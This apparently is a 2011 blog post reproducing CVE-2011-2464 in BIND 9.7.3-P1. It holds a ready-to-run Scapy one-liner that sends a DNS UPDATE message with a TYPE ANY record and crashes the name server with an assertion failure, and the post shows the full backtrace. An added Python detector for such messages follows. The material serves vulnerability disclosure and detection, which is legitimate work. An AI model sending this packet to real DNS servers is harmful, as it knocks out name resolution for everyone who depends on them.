Tuesday, 26 July 2011

CVE-2011-2464

  • Start bind-9.7.3-P1
$ bind-9.7.3-P1/bin/named/named  -g -c named.conf -4
26-Jul-2011 00:19:17.201 starting BIND 9.7.3-P1 -g -c named.conf -4
...
26-Jul-2011 00:19:17.212 listening on IPv4 interface lo, 127.0.0.1#10053...
  • Send a Dynamic DNS delete message (opcode 5) whose update section record has type "ANY"
$ sudo scapy
[sudo] password for richard:
Welcome to Scapy (2.1.0)
>>> conf.L3socket=L3RawSocket
>>> sr1(IP(dst="127.0.0.1")/UDP(dport=10053)/DNS(opcode=5, qd=[DNSQR(qname="example.com", qtype="SOA")], ns=[DNSRR(rrname="foo.example.com", type="ANY", rclass="ANY", rdata="", ttl=0)]), verbose=1, timeout=5)
Begin emission:
Finished to send 1 packets.

Received 8 packets, got 0 answers, remaining 1 packets
  • Oh dear :(
...
26-Jul-2011 00:24:42.740 ncache.c:343: INSIST(remaining.length >= 5) failed, back trace
26-Jul-2011 00:24:42.740 #0 0x805ac28 in assertion_failed()+0x48
26-Jul-2011 00:24:42.740 #1 0x81bfd37 in isc_assertion_failed()+0x27
26-Jul-2011 00:24:42.740 #2 0x80e093e in dns_ncache_towire()+0x57e
26-Jul-2011 00:24:42.740 #3 0x813f05f in towiresorted.clone.0()+0xcf
26-Jul-2011 00:24:42.740 #4 0x80d6b76 in dns_message_rendersection()+0x1a6
26-Jul-2011 00:24:42.740 #5 0x804ffcc in ns_client_send()+0x2bc
26-Jul-2011 00:24:42.740 #6 0x8081b7a in respond()+0xaa
26-Jul-2011 00:24:42.740 #7 0x8086ef9 in ns_update_start()+0x79
26-Jul-2011 00:24:42.740 #8 0x8051c98 in client_request()+0x1118
26-Jul-2011 00:24:42.740 #9 0x81dd0f9 in isc__taskmgr_dispatch()+0x149
26-Jul-2011 00:24:42.740 #10 0x81dffc2 in evloop()+0x92
26-Jul-2011 00:24:42.740 #11 0x81e026f in isc__app_ctxrun()+0x7f
26-Jul-2011 00:24:42.740 #12 0x81e07f2 in isc__app_run()+0x12
26-Jul-2011 00:24:42.740 #13 0x805be62 in main()+0xd32
26-Jul-2011 00:24:42.740 #14 0x272e37 in ??
26-Jul-2011 00:24:42.740 #15 0x804bab1 in _start()+0x21
26-Jul-2011 00:24:42.740 exiting (due to assertion failure)
Aborted (core dumped)
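
A detection-side check for the message shape sent above, as an added example that is not part of the original post: it parses a raw DNS message and reports update-section records with TYPE=ANY and CLASS=ANY in an opcode 5 (UPDATE) message. The function names and the sample message are constructed here; this shape is also a valid RFC 2136 "delete all RRsets from a name" request, so a hit is something to check against the sources allowed to send updates.

```python
import struct

OPCODE_UPDATE, TYPE_ANY, CLASS_ANY = 5, 255, 255   # RFC 2136 / RFC 1035 values

def encode_name(name):
    """Encode a dotted name as uncompressed DNS labels."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def skip_name(buf, off):
    """Return the offset just past the name at off (a compression pointer ends it)."""
    while True:
        if off >= len(buf):
            raise ValueError("truncated name")
        length = buf[off]
        if length & 0xC0 == 0xC0:          # 2-byte pointer terminates the name
            return off + 2
        off += 1 + length
        if length == 0:
            return off

def update_any_records(msg):
    """Indexes of update-section RRs with TYPE=ANY and CLASS=ANY; [] if not an UPDATE."""
    if len(msg) < 12:
        raise ValueError("truncated header")
    _id, flags, zocount, prcount, upcount, _adcount = struct.unpack("!6H", msg[:12])
    if (flags >> 11) & 0xF != OPCODE_UPDATE:
        return []
    off = 12
    for _ in range(zocount):               # zone section: name + ZTYPE + ZCLASS
        off = skip_name(msg, off) + 4
    hits = []
    for i in range(prcount + upcount):     # prerequisites come before updates
        off = skip_name(msg, off)
        if off + 10 > len(msg):
            raise ValueError("truncated record")
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10 + rdlen
        if i >= prcount and rtype == TYPE_ANY and rclass == CLASS_ANY:
            hits.append(i - prcount)
    return hits

def build_message(opcode, rtype, rclass):
    """Constructed sample: zone example.com SOA/IN plus one empty update RR."""
    header = struct.pack("!6H", 0x1234, opcode << 11, 1, 0, 1, 0)
    zone = encode_name("example.com") + struct.pack("!HH", 6, 1)
    rr = encode_name("foo.example.com") + struct.pack("!HHIH", rtype, rclass, 0, 0)
    return header + zone + rr
```
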
Further reading:
